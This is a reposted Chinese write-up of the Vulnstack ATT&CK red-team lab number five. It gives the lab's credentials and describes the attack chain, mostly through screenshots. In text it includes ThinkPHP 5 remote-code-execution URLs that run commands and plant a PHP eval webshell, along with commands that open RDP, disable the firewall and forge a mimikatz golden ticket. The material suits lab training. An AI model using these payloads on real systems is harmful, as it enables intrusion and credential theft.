ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

ATT&CK实战系列——红队实战(五)

2021-07-27 20:29:35  阅读:640  来源: 互联网

标签:实战 CK vars 收集 渗透 com 信息 红队 内网


文章目录

环境搭建

http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

官方描述

大家好,ATT&CK第五个攻防靶场已经出来了,此次靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习,此靶场主要用来学习,请大家遵守网络网络安全法。

描述
虚拟机密码
win7

sun\heart 123.com

sun\Administrator dc123.com

2008

sun\admin 2020.com

Win7双网卡模拟内外网

红队思路
一、环境搭建

1.环境搭建测试

2.信息收集

二、漏洞利用

3.漏洞搜索与利用

4.漏洞利用Getshell

5.系统信息收集

6.主机密码收集

三、内网搜集

7.内网–继续信息收集

8.内网攻击姿势–MS14-058

9.内网攻击姿势–MS17-010

四、横向移动

10.psexec远控

11.内网其它主机端口

12.netsh增删防火墙规则

五、构建通道

13.内网其它主机端口-代理转发

六、持久控制

14.域渗透-域成员信息收集

15.域渗透-基础服务弱口令探测及深度利用之powershell

16.域渗透-横向移动[wmi利用]

17.域渗透-域控实现与利用

七、痕迹清理

18、日志清理

前期信息搜集

80 一个 ThinkPHP 5

在这里插入图片描述

目录扫描得到一个前辈的大马(真不错)

在这里插入图片描述

爆破前辈webshell

拖到burp让它自己爆,接着往下做

在这里插入图片描述

报错得到ThinkPHP 版本

在这里插入图片描述

收集相关版本漏洞复现

ThinkPHP 5.0.22 任意命令执行getshell

payload:

/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

在这里插入图片描述

定位网站路径

在这里插入图片描述

linux 可以使用 echo 写入文件,win使用 php 文件函数 file_put_contents 写入shell

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=wpsec.php&vars[1][]=%3C%3Fphp%20eval(%24_POST%5B'pwd'%5D)%3B%3F%3E

在这里插入图片描述

在这里插入图片描述

我都getshell了这个还没跑出来,太真实了

在这里插入图片描述

大马下下来看了源码后登录大马,其实密码还是挺简单的,我还是太菜了

在这里插入图片描述

大马太垃圾了,什么都用不了,蚁剑直接就是admin权限,太爽了

在这里插入图片描述

内网信息收集

arp信息

在这里插入图片描述
dns信息

在这里插入图片描述

内网渗透

定位域控上代理/CS

在这里插入图片描述

在这里插入图片描述

mimikatz 提取密码

在这里插入图片描述

关闭防火墙,开启RDP

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh firewall set opmode disable

在这里插入图片描述

横向

在这里插入图片描述

17010打不动

在这里插入图片描述

wmiexec 横向

在这里插入图片描述

黄金票据

域:SUN.com
SID:S-1-5-21-3388020223-1982701712-4030140183-500
NTLM:4709c610981029668df9d94ae48eb869

mimikatz # kerberos::golden /domain:sun.com /sid:S-1-5-21-3388020223-1982701712-4030140183-500 /user:wpsec /rc4:4709c610981029668df9d94ae48eb869 /ptt

在这里插入图片描述

ipc登录

在这里插入图片描述

标签:实战,CK,vars,收集,渗透,com,信息,红队,内网
来源: https://blog.csdn.net/qq_38626043/article/details/119141146

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有